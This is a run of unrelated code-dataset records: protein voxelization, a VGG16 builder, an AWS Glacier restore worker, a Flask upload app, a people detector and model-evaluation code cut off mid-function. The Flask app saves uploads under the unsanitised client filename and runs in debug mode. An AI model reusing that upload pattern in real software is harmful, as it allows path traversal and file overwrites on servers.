----------\n truth_residues : list of residue ids or None\n If the binding site is known, add the list of residue ids, usually\n obtained by Structure.align_seq_to_struc()\n only_surface : boolean\n If true, buried atoms are skipped and only atoms on the protein\n surface are mapped. 
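(Each atom is smeared onto every voxel inside its van der Waals radius via get_vdw_grid_coords_for_atom, and a voxel shared by several atoms keeps the elementwise maximum of the contributing feature vectors.) 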
\n Returns\n -------\n indices : np.array((nVoxels,3))\n data : np.array((nVoxels,nFeatures))\n \"\"\"\n assert not self.coarse_grained, \"Cannot be used with the coarse grained model\"\n assert [isinstance(truth_residues, (list, tuple)), autoencoder, isinstance(self.predict_features, (list, tuple))].count(True) == 1, \\\n \"Only truth_residues or autoencoder can be set\"\n\n if truth_residues is not None:\n predicting_features = False\n else:\n predicting_features = isinstance(self.predict_features, (list, tuple))\n\n data_voxels = defaultdict(lambda: np.zeros(len(self.use_features)))\n truth_voxels = {}\n\n voxel_map = {}\n\n b_factors_voxels = {}\n serial_number_voxels = defaultdict(list)\n\n skipped = 0\n skipped_inside = []\n\n if nClasses == 2:\n true_value_ = np.array([0.,1.])\n neg_value_ = np.array([1.,0.])\n elif nClasses == 1:\n true_value_ = np.array([1.])\n neg_value_ = np.array([0.])\n elif nClasses == \"sfams\":\n raise RuntimeError(\"Sfams not implemented\")\n else:\n true_value_ = np.array([1.])\n neg_value_ = np.array([0.])\n\n data = self.data #[self.use_features]\n\n if self.replace_na:\n for feature in self.use_features:\n ind = np.isnan(data[feature])\n data[feature][ind] = default_atom_features[feature]\n\n for atom_index in range(len(self.data)):\n atom = data[atom_index]\n\n if only_surface and atom[\"residue_buried\"]==1:\n continue\n\n if autoencoder or predicting_features:\n truth = True\n elif truth_residues is None:\n truth = False\n else:\n truth = atom[\"residue_id\"] in truth_residues\n\n features = atom[self.use_features]\n\n features = numpy.lib.recfunctions.structured_to_unstructured(features)\n\n if simple_fft is not None:\n features = self.simple_fft_scoring_features(atom, mode=simple_fft)\n\n #Handle truth values if it's not an autoencoder\n if predicting_features:\n truth_value = atom[self.predict_features]\n elif truth_residues is not None:\n truth_value = true_value_.copy() if truth else neg_value_.copy()\n\n if use_raw_atom_coords:\n grid_coords = [tuple(self.coords[atom_index])]\n else:\n grid_coords = [tuple(g) for g in self.get_vdw_grid_coords_for_atom(atom, atom_index)]\n\n voxel_map[atom[\"serial_number\"]] = grid_coords\n\n for atom_grid in grid_coords:\n try:\n data_value = np.maximum(features, data_voxels[atom_grid])\n data_voxels[atom_grid] = data_value\n except ValueError:\n print(data_voxels[atom_grid].shape, features.shape)\n raise\n if not autoencoder:\n truth_voxels[atom_grid] = np.maximum(\n truth_value, truth_voxels.get(atom_grid, truth_value))\n\n b_factors_voxels[atom_grid] = np.maximum(\n atom[\"bfactor\"], b_factors_voxels.get(atom_grid, 0))\n serial_number_voxels[atom_grid].append(atom[\"serial_number\"])\n\n outputs = None\n\n try:\n coords, feats = zip(*data_voxels.items())\n outputs = [np.array(coords), np.array(feats)]\n\n if truth_residues is not None and not autoencoder:\n truth = np.array([truth_voxels[grid] for grid in coords])\n else:\n truth = None\n\n outputs.append(truth)\n\n except Exception as e:\n print(e)\n raise\n\n if return_voxel_map:\n outputs.append(voxel_map)\n else:\n outputs.append(None)\n\n if return_serial:\n outputs.append([serial_number_voxels[grid] for grid in coords])\n else:\n outputs.append(None)\n\n if return_b:\n outputs.append(np.array([b_factors_voxels[grid] for grid in coords]))\n\n return outputs\n\n def map_residues_to_voxel_space(self, truth_residues=None, only_surface=True,\n autoencoder=False, return_voxel_map=False, return_serial=False, 
return_b=False,\n nClasses=2, simple_fft=None, verbose=False):\n return self.map_atoms_to_voxel_space(truth_residues=truth_residues,\n only_surface=only_surface, autoencoder=autoencoder,\n return_voxel_map=return_voxel_map, return_serial=return_serial,\n return_b=return_b, nClasses=nClasses, simple_fft=simple_fft,\n verbose=verbose)\n\n def simple_fft_scoring_features(self, atom_or_residue, mode=\"simple\", b=3):\n \"\"\"Rp=−1 on a surface layer and Rp=1 on the core of the receptor,\n Lp=1 on the entire ligand, and Rp=Lp=0 everywhere else. It is clear that\n this scoring function, which is essentially the one used by\n Katchalski-Katzir et al. (5), reaches its minimum on a conformation in\n which the ligand maximally overlaps with the surface layer of the receptor,\n thus providing optimal shape complementarity. https://doi.org/10.1073/pnas.1603929113\"\"\"\n\n if not self.coarse_grained:\n residue_buried = self.atom_features[atom_or_residue, \"residue_rasa\"]<0.5\n charge = self.features[atom_or_residue, \"charge\"]\n electrostatic_potential = self.features[atom_or_residue, \"electrostatic_potential\"]\n else:\n residue_buried = self.features[atom_or_residue, \"residue_buried\"]\n charge = self.features[atom_or_residue, \"charge\"]\n electrostatic_potential = self.features[atom_or_residue, \"electrostatic_potential\"]\n\n if mode in [True, \"simple\"]:\n if not self.ligand:\n if residue_buried:\n features = np.array([-15, 0])\n else:\n features = np.array([1, 0])\n else:\n features = np.array([1, 0])\n # if residue_buried:\n # features = np.array([-15, 0])\n # else:\n # features = np.array([1, 0])\n\n return features\n\n elif mode == \"zdock\":\n psc_elec = np.array([\n 3.5**2 if residue_buried else 3.5, #Same for ligand\n charge if not self.ligand else 0\n ])\n\n return psc_elec\n\n else:\n print(\"Mode is\", mode, mode in [True])\n\n def get_vdw_grid_coords_for_atom(self, atom, atom_index):\n dist = self.get_vdw(atom)\n coord = np.around(self.coords[atom_index], decimals=4)\n neighbors = self.voxel_tree.query_ball_point(coord, r=dist)\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n def get_closest_grid_coord_for_atom(self, atom):\n _, neighbors = self.voxel_tree.query([atom.coord])\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n def get_vdw_grid_coords_for_residue(self, residue):\n dist = vdw_aa_radii.get(residue.get_resname(), 3.2)\n center = np.nanmean([a.get_coord() for a in residue], axis=0)\n neighbors = self.voxel_tree.query_ball_point(center, r=dist)\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n def get_closest_grid_coord_for_residue(self, residue):\n center = np.nanmean([a.get_coord() for a in residue], axis=0)\n _, neighbors = self.voxel_tree.query([center])\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n # def rotate(self, rvs=None, num=1):\n # for r, M in super().rotate(rvs=rvs, num=num):\n # self.set_voxel_size(self.voxel_size)\n # yield r, M\n\n def resize_volume(self, new_volume, shift=True):\n super().resize_volume(new_volume, shift=shift)\n self.set_voxel_size(self.voxel_size)\n\n def set_voxel_size(self, voxel_size=None, full_grid=True):\n self.voxel_size = voxel_size or 1.0\n\n coords = self.get_coords()\n min_coord = np.floor(np.nanmin(coords, axis=0))-5\n max_coord = np.ceil(np.nanmax(coords, axis=0))+5\n max_dist = np.linalg.norm(max_coord-min_coord)\n\n if full_grid:\n min_coord_ = np.zeros(3)\n max_coord_ = np.array([self.volume]*3)\n max_dist_ = np.linalg.norm(max_coord_-min_coord_)\n\n fail = False\n if 
np.any(min_coord < min_coord_) or np.any(max_coord > max_coord_):\n print(f\"Coordinates outside grid: min {min_coord} < {min_coord_} or max {max_coord} > {max_coord_}\")\n fail = True\n assert not fail\n # assumption: with full_grid=True the voxel grid spans the whole fixed volume\n max_coord = max_coord_\n min_coord = min_coord_\n\n extent_x = np.arange(min_coord[0], max_coord[0], self.voxel_size)\n extent_y = np.arange(min_coord[1], max_coord[1], self.voxel_size)\n extent_z = np.arange(min_coord[2], max_coord[2], self.voxel_size)\n mx, my, mz = np.meshgrid(extent_x, extent_y, extent_z)\n\n self.voxel_tree = spatial.cKDTree(list(zip(mx.ravel(), my.ravel(), mz.ravel())))\n #spatial.cKDTree(self.get_coords())\n\n def convert_voxels(self, grid, radius=2.75, level=\"A\"):\n \"\"\"Convert grid points to atoms\n \"\"\"\n if self.atom_tree is None:\n self.atom_tree = spatial.cKDTree(list(self.get_atoms()))\n\n idx = self.atom_tree.query_ball_point(grid, radius)\n return self.data[idx]\n\n def get_overlapping_voxels(self):\n neighbor_atoms = self.calculate_neighbors(d_cutoff=5.0, level=\"A\")\n for a1, a2 in neighbor_atoms:\n v1 = set(self.get_vdw_grid_coords_for_atom(a1))\n v2 = set(self.get_vdw_grid_coords_for_atom(a2))\n overlap = v1.intersection(v2)\n yield a1, a2, overlap\n","sub_path":"molmimic/common/DistributedVoxelizedStructure.py","file_name":"DistributedVoxelizedStructure.py","file_ext":"py","file_size_in_byte":15125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"168414493","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# vgg16_conv_fc.py\n\n\"\"\"\nThe script is a self-contained, object-oriented realization of the VGG16 model with the \nreturn value \"conv_base\" or \"model\". It is an attempt to re-organize both the conv_base and fc_base\nfor flexible usage. \n\nIn addition, it has a consolidated structure in pure TensorFlow 2.x. We keep the same 1000 class \nnumbers. Please use the following call convention if users adopt any client script to call the VGG16 \nmodel.\n\nIssues:\n\nThe script includes duplicated lines of code because the function of Concatenate or k.concatenate can \nnot assemble the abstract layers in the Sequential Model. Therefore, we need to eliminate the repeated \ncode for an elegant realization. \n\n# https://keras.io/api/layers/merging_layers/concatenate/\n# -from tensorflow.keras.layers import Concatenate\nor\n# -import keras.backend as K\nor \n# -model = merge(conv_base + fc_base) \n\nAccording to the formula of Stanford cs231n, W_output = (W-F+2P)/S + 1. W,F,P,S are input width, filter \nwidth, padding size and stride respectively. H_output = W_output follows immediately, since the model 
It is the apparent result of H_output = W_output since we \nrequires the square size of filters.\n\nStanford c231n \nhttps://cs231n.github.io/convolutional-networks/#conv\n\nVery Deep Convolutional Networks for Large-Scale Image Recognition\nICLR 2015: https://arxiv.org/abs/1409.1556\n\nKeras code: \nhttps://github.com/keras-team/keras-applications/blob/master/keras_applications/vgg16.py\n\nTensorflow code: \nhttps://github.com/tensorflow/models/blob/master/research/slim/nets/vgg.py\n\"\"\"\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\nclass Vgg16(object):\n # Adopt the static method to enable the elegant realization of the model \n @staticmethod \n def build(input_shape, num_classes, exclude_fc=None):\n\n if exclude_fc: \n # Make the sequential conv_base \n conv_base = keras.Sequential(\n [ \n keras.Input(shape=input_shape),\n\n # Conv Block 1 \n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 2 \n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 3 \n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 4 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 5 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n ]\n )\n return conv_base \n\n else: \n # Make the sequential conv_base \n model = keras.Sequential(\n [ \n keras.Input(shape=input_shape),\n\n # Conv Block 1 \n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 2 \n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n 
layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 3 \n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 4 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 5 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # FC classifier \n layers.Flatten(),\n layers.Dense(units=4096, activation=\"relu\"),\n layers.Dense(units=4096, activation=\"relu\"),\n layers.Dense(units=num_classes, activation=\"softmax\")\n\n ]\n )\n\n return model\n \n \nif __name__ == '__main__':\n \n # Assign the values \n input_shape = (227,227,3)\n num_classes = 1000\n # -exclude_fc = False \n exclude_fc = True\n\n # Call the function of build() in the Vgg16 class with the dot syntax\n # -model = Vgg16().build(input_shape, num_classes, exclude_fc)\n conv_base = Vgg16().build(input_shape, num_classes, exclude_fc)\n\n # Show the Vgg16 Model \n # -model.summary()\n conv_base.summary()\n","sub_path":"vgg16_model_sets/vgg16_conv_fc.py","file_name":"vgg16_conv_fc.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"605377908","text":"# restore.py\n#\n# NOTE: This file lives on the Utils instance\n#\n# Copyright (C) 2011-2019 Vas Vasiliadis\n# University of Chicago\n##\n__author__ = 'Vas Vasiliadis '\n\nimport os\nimport sys\n\n# Import utility helpers\nsys.path.insert(1, os.path.realpath(os.path.pardir))\nimport helpers\n\n# Get configuration\nfrom configparser import SafeConfigParser\n\nconfig = SafeConfigParser(os.environ)\nconfig.read('restore_config.ini')\n\n# Add utility code here\nimport boto3\nimport botocore\nfrom botocore.client import Config\nimport requests\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\nimport json\n\n# Connect to SQS and get the message from the queue\n# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sqs.html#SQS.Queue\nsqs = boto3.resource('sqs', region_name=config['aws']['AwsRegionName'])\nqueue = sqs.Queue(url=config['aws']['RestoreQueueUrl'])\nglacier_client = boto3.client('glacier', region_name=config['aws']['AwsRegionName'])\nsnsClient = boto3.client('sns', region_name=config['aws']['AwsRegionName'])\n\ndynamo = boto3.resource('dynamodb', region_name=config['aws']['AwsRegionName'])\ntable = dynamo.Table(config['aws']['AWSDynamodbAnnotationsTable'])\n\n# Poll the message queue in a loop\nwhile 
True:\n # Attempt to read a message from the Queue\n # Use long polling here, with 20-second wait times\n # print(f\"Polling SQS with {config['aws']['PollWaitTime']} seconds wait time\")\n response = queue.receive_messages(\n WaitTimeSeconds=int(config['aws']['PollWaitTime']),\n )\n\n if response:\n message_body = json.loads(response[0].body)\n message_data = json.loads(message_body[\"Message\"])\n # print(\"Message Read in restore.py\")\n # print(f'{message_data}')\n\n user_id = message_data[\"user_id\"]\n thaw_status = message_data[\"thaw_status\"]\n\n # print(f'User {user_id} bought premium. Status {thaw_status}')\n\n query_dict = table.scan(\n FilterExpression=Attr('user_id').eq(user_id) & Attr('storage_status').eq('ARCHIVED'),\n )\n # note: the archive process immediately specifies 'ARCHIVED' for storage_status\n # and it only archives for free users. If a user converts to premium within 5 minutes of a job,\n # nothing happens. If a user converted to premium while one is being archived,\n # it will show up and be put into this query dictionary for retrieval\n\n # print(f'\\n\\n\\nPrinting query dictionary: \\n\\n\\n {query_dict}\\n\\n\\n')\n\n for item in query_dict['Items']:\n\n try:\n # print(\"trying data retrieval expedited\")\n # docs.aws.amazon.com/amazonglacier/latest/dev/api-initiate-job-post.html\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.initiate_job\n glacier_response = glacier_client.initiate_job(\n accountId='-',\n vaultName=config['aws']['VaultName'],\n jobParameters={\n 'Description': item['s3_key_result_file'],\n 'SNSTopic': config['aws']['ThawARN'],\n 'ArchiveId': item['results_file_archive_id'],\n 'Type': \"archive-retrieval\",\n 'Tier': 'Expedited',\n }\n )\n # print(response)\n except ClientError as e:\n try:\n # print(\"Failed data retrieval expedited, trying standard\")\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.initiate_job\n glacier_response = glacier_client.initiate_job(\n accountId='-',\n vaultName='ucmpcs',\n jobParameters={\n 'Description': item['s3_key_result_file'],\n 'SNSTopic': config['aws']['ThawARN'],\n 'ArchiveId': str(item['results_file_archive_id']),\n 'Type': \"archive-retrieval\",\n 'Tier': 'Standard',\n }\n )\n # print(response)\n except ClientError as e:\n # print(\"Unable to retrieve from archive\")\n raise e\n\n try:\n # print(\"Deleting notify message now--not now\")\n response[0].delete()\n except ClientError as e:\n # print(\"Failed to delete message from sqs: {}\".format(str(e)))\n # print(str(e))\n raise\n### EOF\n","sub_path":"gas/util/restore/restore.py","file_name":"restore.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148021626","text":"import os\nfrom flask import Flask, request, render_template, redirect\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n file = request.files['image']\n if file is not None and file.filename != '':\n path = 'static/' + file.filename\n file.save(path)\n return redirect('/static/' + file.filename)\n else:\n return 'Something happened, cannot upload the file. 
Please try again'\napp.run(debug=True)\n","sub_path":"upload_file_flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263753372","text":"\"\"\"\nWhat do we want to detect? names of recognized people, # unrecognized people, # of unknown people\nTime sensitivity issue: use mode\npeople shouldn't be too small\n\"\"\"\n\nimport cv2\nprint(cv2.__version__)\nimport tensorflow as tf\nprint(tf.__version__)\nimport numpy as np\nimport time\nimport math\n\n#Detector API based on tutorial https://medium.com/@madhawavidanapathirana/real-time-human-detection-in-computer-vision-part-2-c7eda27115c6 \n# who himself references https://gist.github.com/madhawav/1546a4b99c8313f06c0b2d7d7b4a09e2\nclass DetectorAPI:\n def __init__(self, path_to_ckpt):\n self.path_to_ckpt = path_to_ckpt\n\n self.detection_graph = tf.Graph()\n with self.detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(self.path_to_ckpt, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n self.default_graph = self.detection_graph.as_default()\n self.sess = tf.Session(graph=self.detection_graph)\n\n # Definite input and output Tensors for detection_graph\n self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')\n self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')\n\n def processFrame(self, image):\n # Expand dimensions since the trained_model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image, axis=0)\n # Actual detection.\n start_time = time.time()\n (boxes, scores, classes, num) = self.sess.run(\n [self.detection_boxes, self.detection_scores, self.detection_classes, self.num_detections],\n feed_dict={self.image_tensor: image_np_expanded})\n end_time = time.time()\n elapsed_time = end_time-start_time\n\n im_height, im_width,_ = image.shape\n boxes_list = [None for i in range(boxes.shape[1])]\n for i in range(boxes.shape[1]):\n boxes_list[i] = (int(boxes[0,i,0] * im_height),\n int(boxes[0,i,1]*im_width),\n int(boxes[0,i,2] * im_height),\n int(boxes[0,i,3]*im_width))\n\n return boxes_list, scores[0].tolist(), [int(x) for x in classes[0].tolist()], int(num[0]), elapsed_time\n\n def close(self):\n self.sess.close()\n self.default_graph.close()\n\ndef default_callback(frame_index, person_count): \n str = frame_index + person_count\ndef count_people_video(model='ssd_mobilenet_v1_coco_2018_01_28/frozen_inference_graph.pb', \n video='http://10.1.2.155:4747/mjpegfeed?640x480', \n print_count=True, \n print_fps=True,\n visual=True,\n threshold=0.1):\n model_path = 'models/'+model\n video_path = video\n odapi = DetectorAPI(path_to_ckpt=model_path)\n #cap = cv2.VideoCapture('/content/drive/My Drive/Photos/Google Photos/VID_20190101_195059.mp4')\n #cap = cv2.VideoCapture('/content/drive/My Drive/MOV_0011.mp4')\n cap = 
cv2.VideoCapture(video_path)\n if not cap.isOpened():\n print(\"Can't open video.\")\n return\n while cap.isOpened():\n r, img = cap.read()\n if not r:\n break\n img = cv2.resize(img, (1280, 720))\n\n boxes, scores, classes, num, elapsed_time = odapi.processFrame(img)\n\n boxcount = 0\n for i in range(len(boxes)):\n # Class 1 represents human\n if classes[i] == 1 and scores[i] > threshold:\n boxcount += 1\n box = boxes[i]\n img = cv2.rectangle(img,(box[1],box[0]),(box[3],box[2]),(255,0,0),2)\n print_str = \"\"\n if print_count:\n print_str = \"Frame has \"+str(boxcount)+\" people in it.\"\n if print_fps:\n fps = 1/elapsed_time\n print_str += \" (\"+str(round(fps, 2))+\" FPS)\"\n if print_count or print_fps:\n print(print_str)\n\n if visual:\n cv2.imshow(\"Preview\", cv2.resize(img, (640, 480)))\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncount_people_video(visual=True, print_fps=True)","sub_path":"ML/detect_wifi.py","file_name":"detect_wifi.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"93438582","text":"'''!\n * Copyright (c) 2020 Microsoft Corporation. All rights reserved.\n * Licensed under the MIT License. \n'''\n \nfrom .model import *\nimport time\nfrom sklearn.metrics import mean_squared_error, r2_score, roc_auc_score, \\\n accuracy_score, mean_absolute_error, log_loss, average_precision_score, \\\n f1_score\nimport numpy as np\nfrom sklearn.model_selection import RepeatedStratifiedKFold\n\n\ndef get_estimator_class(objective_name, estimator_name):\n ''' when adding a new learner, need to add an elif branch '''\n\n\n if 'xgboost' in estimator_name:\n if 'regression' in objective_name:\n estimator_class = XGBoostEstimator\n else:\n estimator_class = XGBoostSklearnEstimator\n elif 'rf' in estimator_name:\n estimator_class = RandomForestEstimator\n elif 'lgbm' in estimator_name:\n estimator_class = LGBMEstimator\n elif 'lrl1' in estimator_name:\n estimator_class = LRL1Classifier\n elif 'lrl2' in estimator_name:\n estimator_class = LRL2Classifier \n elif 'catboost' in estimator_name:\n estimator_class = CatBoostEstimator\n elif 'extra_tree' in estimator_name:\n estimator_class = ExtraTreeEstimator\n elif 'kneighbor' in estimator_name:\n estimator_class = KNeighborsEstimator\n else:\n raise ValueError(estimator_name + ' is not a built-in learner. '\n 'Please use AutoML.add_learner() to add a customized learner.')\n return estimator_class\n \n\ndef sklearn_metric_loss_score(metric_name, y_predict, y_true, labels=None):\n '''Loss using the specified metric\n\n Args:\n metric_name: A string of the metric name, one of \n 'r2', 'rmse', 'mae', 'mse', 'accuracy', 'roc_auc', 'log_loss', \n 'f1', 'ap'\n y_predict: A 1d or 2d numpy array of the predictions which can be\n used to calculate the metric. E.g., 2d for log_loss and 1d\n for others. 
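(The helper get_y_pred below applies this convention: it calls predict_proba for 'log_loss' and 'roc_auc', and for 'ap' on binary objectives, falling back to plain predict otherwise.) 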
\n y_true: A 1d numpy array of the true labels\n labels: A 1d numpy array of the unique labels\n \n Returns:\n score: A float number of the loss, the lower the better\n '''\n metric_name = metric_name.lower()\n if 'r2' in metric_name:\n score = 1.0 - r2_score(y_true, y_predict)\n elif metric_name == 'rmse':\n score = np.sqrt(mean_squared_error(y_true, y_predict))\n elif metric_name == 'mae':\n score = mean_absolute_error(y_true, y_predict)\n elif metric_name == 'mse':\n score = mean_squared_error(y_true, y_predict)\n elif metric_name == 'accuracy':\n score = 1.0 - accuracy_score(y_true, y_predict)\n elif 'roc_auc' in metric_name:\n score = 1.0 - roc_auc_score(y_true, y_predict)\n elif 'log_loss' in metric_name:\n score = log_loss(y_true, y_predict, labels=labels)\n elif 'f1' in metric_name:\n score = 1 - f1_score(y_true, y_predict)\n elif 'ap' in metric_name:\n score = 1 - average_precision_score(y_true, y_predict)\n else:\n raise ValueError(metric_name+' is not a built-in metric, '\n 'currently built-in metrics are: '\n 'r2, rmse, mae, mse, accuracy, roc_auc, log_loss, f1, ap. '\n 'please pass a customized metric function to AutoML.fit(metric=func)')\n return score\n\n\ndef get_y_pred(estimator, X, eval_metric, obj):\n if eval_metric in ['roc_auc', 'ap'] and 'binary' in obj:\n y_pred_classes = estimator.predict_proba(X) \n y_pred = y_pred_classes[:,\n 1] if y_pred_classes.ndim>1 else y_pred_classes\n elif eval_metric in ['log_loss', 'roc_auc']:\n y_pred = estimator.predict_proba(X)\n else:\n y_pred = estimator.predict(X)\n return y_pred\n\n\ndef get_test_loss(estimator, X_train, y_train, X_test, y_test, eval_metric, obj,\n labels=None, budget=None, train_loss=False):\n start = time.time()\n train_time = estimator.fit(X_train, y_train, budget)\n if isinstance(eval_metric, str):\n test_pred_y = get_y_pred(estimator, X_test, eval_metric, obj)\n test_loss = sklearn_metric_loss_score(eval_metric, test_pred_y, y_test,\n labels)\n if train_loss != False:\n test_pred_y = get_y_pred(estimator, X_train, eval_metric, obj)\n train_loss = sklearn_metric_loss_score(eval_metric, test_pred_y,\n y_train, labels)\n else: # customized metric function\n test_loss, train_loss = eval_metric(\n X_test, y_test, estimator, labels, X_train, y_train)\n train_time = time.time()-start\n return test_loss, train_time, train_loss\n\n\ndef train_model(estimator, X_train, y_train, budget):\n train_time = estimator.fit(X_train, y_train, budget)\n return train_time\n\n\ndef evaluate_model(estimator, X_train, y_train, X_val, y_val, budget, kf,\n objective_name, eval_method, eval_metric, best_val_loss, train_loss=False):\n if 'holdout' in eval_method:\n val_loss, train_loss, train_time = evaluate_model_holdout(\n estimator, X_train, y_train, X_val, y_val, budget, \n objective_name, eval_metric, best_val_loss, train_loss=train_loss)\n else:\n val_loss, train_loss, train_time = evaluate_model_CV(\n estimator, X_train, y_train, budget, kf, objective_name, \n eval_metric, best_val_loss, train_loss=train_loss)\n return val_loss, train_loss, train_time\n\n\ndef evaluate_model_holdout(estimator, X_train, y_train, X_val, y_val, budget,\n objective_name, eval_metric, best_val_loss, train_loss=False):\n val_loss, train_time, train_loss = get_test_loss(\n estimator, X_train, y_train, X_val, y_val, eval_metric, objective_name,\n budget = budget, train_loss=train_loss)\n return val_loss, train_loss, train_time\n\n\ndef evaluate_model_CV(estimator, X_train_all, y_train_all, budget, kf,\n objective_name, eval_metric, best_val_loss, 
train_loss=False):\n start_time = time.time()\n total_val_loss = total_train_loss = 0\n train_time = 0\n valid_fold_num = 0\n n = kf.get_n_splits()\n X_train_split, y_train_split = X_train_all, y_train_all\n if objective_name=='regression':\n labels = None\n else:\n labels = np.unique(y_train_all) \n\n if isinstance(kf, RepeatedStratifiedKFold):\n kf = kf.split(X_train_split, y_train_split)\n else:\n kf = kf.split(X_train_split)\n rng = np.random.RandomState(2020)\n val_loss_list = []\n budget_per_train = budget / (n+1)\n for train_index, val_index in kf:\n train_index = rng.permutation(train_index)\n if isinstance(X_train_all, pd.DataFrame):\n X_train, X_val = X_train_split.iloc[\n train_index], X_train_split.iloc[val_index]\n else:\n X_train, X_val = X_train_split[\n train_index], X_train_split[val_index]\n if isinstance(y_train_all, pd.Series):\n y_train, y_val = y_train_split.iloc[\n train_index], y_train_split.iloc[val_index]\n else:\n y_train, y_val = y_train_split[\n train_index], y_train_split[val_index]\n estimator.cleanup()\n val_loss_i, train_time_i, train_loss_i = get_test_loss(\n estimator, X_train, y_train, X_val, y_val, eval_metric, \n objective_name, labels, budget_per_train, train_loss=train_loss)\n valid_fold_num += 1\n total_val_loss += 